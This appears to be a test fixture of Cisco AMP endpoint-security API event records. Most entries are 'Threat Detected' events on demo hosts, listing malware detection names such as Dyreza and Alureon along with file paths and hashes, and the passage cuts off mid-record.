Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257843180601000,"timestamp":1610705569,"timestamp_nanoseconds":536000000,"date":"2021-01-15T10:12:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257843180601413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":834324,"timestamp":1610705568,"timestamp_nanoseconds":82375000,"date":"2021-01-15T10:12:48+00:00","event_type":"Uninstall","event_type_id":553648166,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257791640994000,"timestamp":1610705557,"timestamp_nanoseconds":898000000,"date":"2021-01-15T10:12:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257791640993860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257740101386000,"timestamp":1610705545,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:12:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257740101386307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257688561779000,"timestamp":1610705533,"timestamp_nanoseconds":874000000,"date":"2021-01-15T10:12:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257688561778754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257641317138000,"timestamp":1610705522,"timestamp_nanoseconds":236000000,"date":"2021-01-15T10:12:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257641317138497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":641000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667317698527247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257589777531000,"timestamp":1610705510,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:11:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257589777530944","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257564007727000,"timestamp":1610705504,"timestamp_nanoseconds":218000000,"date":"2021-01-15T10:11:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257564007727167","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257512468120000,"timestamp":1610705492,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:11:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257512468119614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257460928512000,"timestamp":1610705480,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:11:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257460928512061","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789131","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"5A.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16d